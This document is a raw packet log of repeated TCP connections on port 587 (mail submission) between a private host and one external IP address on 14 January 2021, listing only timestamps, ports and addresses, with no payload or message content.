Jan 14, 2021 08:01:52.652041912 CET	587	49812	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:52.653754950 CET	49812	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:52.692033052 CET	49813	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:52.707197905 CET	587	49810	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:52.707220078 CET	587	49810	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:52.707264900 CET	587	49810	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:52.707385063 CET	587	49810	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:52.707397938 CET	587	49810	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:52.707539082 CET	587	49810	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:52.709816933 CET	587	49810	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:52.709832907 CET	587	49810	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:52.709980011 CET	587	49810	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:52.710237026 CET	587	49810	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:52.710261106 CET	587	49810	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:52.711169958 CET	587	49810	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:52.712256908 CET	587	49810	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:52.712825060 CET	587	49810	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:52.712841034 CET	587	49810	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:52.713121891 CET	587	49810	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:52.713233948 CET	587	49810	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:52.713610888 CET	587	49810	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:52.713676929 CET	587	49810	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:52.713798046 CET	587	49810	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:52.713898897 CET	587	49810	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:52.714286089 CET	587	49810	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:52.725991011 CET	587	49810	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:52.769407034 CET	49810	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:52.843907118 CET	587	49812	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:52.847449064 CET	587	49812	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:52.848170042 CET	49812	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:52.882805109 CET	587	49813	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:52.883585930 CET	49813	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:53.038481951 CET	587	49812	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:53.038985014 CET	587	49812	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:53.040832996 CET	49812	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:53.076587915 CET	587	49813	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:53.077069998 CET	49813	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:53.230717897 CET	587	49812	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:53.267254114 CET	587	49813	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:53.270800114 CET	587	49813	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:53.270828962 CET	587	49812	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:53.271234989 CET	49813	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:53.271446943 CET	49812	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:53.461445093 CET	587	49813	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:53.461464882 CET	587	49812	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:53.462275028 CET	587	49812	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:53.463438034 CET	49812	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:53.463630915 CET	49812	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:53.463757992 CET	49812	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:53.463908911 CET	49812	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:53.464050055 CET	49812	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:53.464220047 CET	49813	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:53.464328051 CET	49812	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:53.464348078 CET	49812	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:53.464459896 CET	49812	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:53.653346062 CET	587	49812	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:53.653378963 CET	587	49812	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:53.653450966 CET	587	49812	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:53.653662920 CET	587	49812	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:53.653860092 CET	587	49812	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:53.654153109 CET	587	49812	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:53.654253960 CET	587	49812	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:53.654268026 CET	587	49813	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:53.654460907 CET	587	49813	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:53.654479980 CET	587	49813	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:53.654567003 CET	49813	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:53.660490990 CET	49813	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:53.661592960 CET	49813	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:53.662832022 CET	587	49812	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:53.706079960 CET	49812	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:53.850688934 CET	587	49813	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:53.850723028 CET	587	49813	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:53.851697922 CET	587	49813	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:53.852046013 CET	587	49813	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:53.852593899 CET	49813	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:53.860238075 CET	49812	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:54.042721987 CET	587	49813	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:54.045706987 CET	587	49813	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:54.046236038 CET	49813	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:54.050240040 CET	587	49812	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:54.052174091 CET	587	49812	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:54.052278042 CET	587	49812	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:54.052400112 CET	49812	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:54.053014040 CET	49812	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:54.236423969 CET	587	49813	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:54.242995977 CET	587	49812	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:54.243036985 CET	587	49813	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:54.243711948 CET	49813	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:54.433809996 CET	587	49813	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:54.435895920 CET	587	49813	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:54.436388969 CET	49813	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:54.626647949 CET	587	49813	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:54.651671886 CET	587	49813	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:54.652246952 CET	49813	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:54.842488050 CET	587	49813	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:54.844099045 CET	587	49813	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:54.844758034 CET	49813	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:54.844858885 CET	49813	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:54.844994068 CET	49813	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:54.845129013 CET	49813	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:54.845252037 CET	49813	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:54.845400095 CET	49813	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:54.845510006 CET	49813	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:55.035114050 CET	587	49813	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:55.035162926 CET	587	49813	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:55.035190105 CET	587	49813	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:55.035219908 CET	49813	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:55.035268068 CET	49813	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:55.035300016 CET	587	49813	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:55.035367966 CET	49813	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:55.035473108 CET	49813	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:55.035476923 CET	587	49813	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:55.035542011 CET	587	49813	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:55.035581112 CET	49813	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:55.035604000 CET	49813	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:55.035609007 CET	49813	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:55.035676956 CET	49813	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:55.225466967 CET	587	49813	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:55.225495100 CET	587	49813	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:55.225517035 CET	587	49813	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:55.225581884 CET	49813	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:55.225630045 CET	49813	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:55.225677967 CET	587	49813	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:55.225689888 CET	587	49813	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:55.225764990 CET	49813	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:55.285736084 CET	49814	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:55.417560101 CET	587	49813	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:55.417603016 CET	587	49813	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:55.417704105 CET	49813	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:55.417757988 CET	49813	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:55.418680906 CET	587	49813	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:55.418823957 CET	49813	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:55.476633072 CET	587	49814	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:55.476738930 CET	49814	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:55.612010956 CET	587	49813	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:55.612055063 CET	587	49813	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:55.612078905 CET	587	49813	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:55.612103939 CET	587	49813	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:55.612128973 CET	587	49813	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:55.612153053 CET	587	49813	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:55.612176895 CET	587	49813	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:55.612201929 CET	587	49813	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:55.612236977 CET	587	49813	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:55.612265110 CET	587	49813	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:55.612281084 CET	587	49813	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:55.612356901 CET	49813	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:55.612483978 CET	49813	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:55.612584114 CET	49813	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:55.612607002 CET	49813	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:55.612616062 CET	49813	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:55.612623930 CET	49813	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:55.612710953 CET	49813	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:55.612860918 CET	49813	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:55.612994909 CET	49813	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:55.613087893 CET	49813	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:55.613218069 CET	49813	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:55.613332033 CET	49813	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:55.613472939 CET	49813	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:55.613558054 CET	49813	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:55.613687038 CET	49813	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:55.613787889 CET	49813	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:55.613893032 CET	49813	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:55.614010096 CET	49813	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:55.668385029 CET	587	49814	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:55.668708086 CET	49814	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:55.803107977 CET	587	49813	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:55.803139925 CET	587	49813	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:55.803505898 CET	587	49813	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:55.803534031 CET	587	49813	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:55.803713083 CET	587	49813	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:55.803730011 CET	587	49813	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:55.804008007 CET	587	49813	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:55.804090023 CET	587	49813	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:55.804106951 CET	587	49813	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:55.804325104 CET	587	49813	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:55.804446936 CET	587	49813	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:55.804646969 CET	587	49813	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:55.813994884 CET	587	49813	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:55.858813047 CET	587	49814	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:55.859302044 CET	587	49814	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:55.861972094 CET	49814	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:55.862458944 CET	49813	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:56.052262068 CET	587	49814	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:56.053350925 CET	49814	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:56.243360043 CET	587	49814	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:56.243513107 CET	587	49814	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:56.243618965 CET	587	49814	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:56.245305061 CET	49814	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:56.248019934 CET	49814	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:56.248930931 CET	49814	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:56.437973022 CET	587	49814	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:56.438158035 CET	587	49814	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:56.438766003 CET	587	49814	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:56.439848900 CET	587	49814	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:56.441001892 CET	49814	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:56.631064892 CET	587	49814	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:56.632577896 CET	587	49814	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:56.633341074 CET	49814	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:56.823421001 CET	587	49814	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:56.826718092 CET	587	49814	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:56.829133034 CET	49814	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:57.019223928 CET	587	49814	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:57.022239923 CET	587	49814	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:57.025518894 CET	49814	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:57.100764036 CET	49813	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:57.102446079 CET	49815	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:57.105767965 CET	49810	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:57.215570927 CET	587	49814	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:57.242219925 CET	587	49814	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:57.242877007 CET	49814	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:57.290950060 CET	587	49813	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:57.291367054 CET	587	49813	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:57.291848898 CET	49813	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:57.292574883 CET	587	49815	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:57.293203115 CET	49815	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:57.295731068 CET	587	49810	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:57.296107054 CET	587	49810	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:57.298120022 CET	49810	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:57.432833910 CET	587	49814	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:57.437853098 CET	587	49814	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:57.438448906 CET	49814	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:57.438596964 CET	49814	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:57.438762903 CET	49814	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:57.438920975 CET	49814	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:57.484947920 CET	49814	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:57.486742973 CET	587	49815	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:57.488416910 CET	49815	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:57.628518105 CET	587	49814	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:57.628550053 CET	587	49814	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:57.628757954 CET	49814	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:57.628798008 CET	587	49814	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:57.628844023 CET	49814	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:57.628885031 CET	587	49814	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:57.675091028 CET	587	49814	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:57.675399065 CET	49814	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:57.677957058 CET	587	49815	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:57.678283930 CET	587	49815	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:57.679305077 CET	49815	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:57.818969011 CET	587	49814	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:57.819133997 CET	49814	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:57.819169998 CET	49814	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:57.865432024 CET	587	49814	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:57.865616083 CET	49814	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:57.868951082 CET	587	49815	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:57.873886108 CET	49815	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:57.965245962 CET	587	49814	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:57.966600895 CET	49814	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:58.009263992 CET	587	49814	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:58.009418964 CET	49814	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:58.055789948 CET	587	49814	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:58.055911064 CET	587	49814	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:58.055911064 CET	49814	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:58.056329012 CET	49814	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:58.063661098 CET	587	49815	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:58.063710928 CET	587	49815	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:58.063781977 CET	587	49815	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:58.064743996 CET	49815	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:58.065476894 CET	49815	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:58.066643000 CET	49815	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:58.157335997 CET	587	49814	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:58.157614946 CET	49814	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:58.199628115 CET	587	49814	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:58.199660063 CET	587	49814	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:58.199779987 CET	49814	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:58.246198893 CET	587	49814	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:58.246315956 CET	587	49814	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:58.246334076 CET	587	49814	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:58.246347904 CET	587	49814	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:58.246471882 CET	49814	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:58.246540070 CET	49814	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:58.246710062 CET	587	49814	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:58.246783018 CET	49814	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:58.255166054 CET	587	49815	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:58.255196095 CET	587	49815	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:58.256346941 CET	587	49815	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:58.257596016 CET	587	49815	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:58.258529902 CET	49815	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:58.347681046 CET	587	49814	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:58.347709894 CET	587	49814	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:58.347824097 CET	49814	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:58.389897108 CET	587	49814	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:58.389930010 CET	587	49814	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:58.390045881 CET	49814	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:58.390074015 CET	587	49814	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:58.390275002 CET	49814	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:58.437021971 CET	587	49814	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:58.437062025 CET	587	49814	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:58.437200069 CET	49814	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:58.437442064 CET	587	49814	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:58.437463999 CET	587	49814	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:58.437577963 CET	49814	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:58.437653065 CET	587	49814	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:58.437906027 CET	587	49814	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:58.437946081 CET	49814	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:58.437999964 CET	49814	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:58.448270082 CET	587	49815	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:58.449538946 CET	587	49815	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:58.450345039 CET	49815	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:58.537941933 CET	587	49814	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:58.537969112 CET	587	49814	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:58.537985086 CET	587	49814	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:58.538213015 CET	587	49814	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:58.538353920 CET	49814	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:58.538429022 CET	49814	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:58.580059052 CET	587	49814	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:58.580140114 CET	587	49814	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:58.580410957 CET	587	49814	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:58.580558062 CET	49814	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:58.627320051 CET	587	49814	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:58.627372026 CET	587	49814	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:58.627530098 CET	49814	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:58.627754927 CET	587	49814	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:58.627789021 CET	587	49814	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:58.627877951 CET	587	49814	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:58.627887964 CET	49814	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:58.627916098 CET	587	49814	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:58.627935886 CET	49814	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:58.628000021 CET	587	49814	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:58.628017902 CET	49814	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:58.628037930 CET	587	49814	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:58.628062010 CET	49814	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:58.628241062 CET	587	49814	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:58.628242016 CET	49814	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:58.628326893 CET	49814	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:58.640002012 CET	587	49815	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:58.644365072 CET	587	49815	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:58.644927979 CET	49815	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:58.728718996 CET	587	49814	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:58.728744984 CET	587	49814	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:58.728755951 CET	587	49814	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:58.729403973 CET	49814	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:58.729451895 CET	49814	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:58.771137953 CET	587	49814	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:58.771166086 CET	587	49814	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:58.771182060 CET	587	49814	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:58.771341085 CET	49814	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:58.817606926 CET	587	49814	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:58.817754984 CET	587	49814	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:58.817775965 CET	49814	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:58.817913055 CET	49814	587	192.168.2.3	199.193.7.228
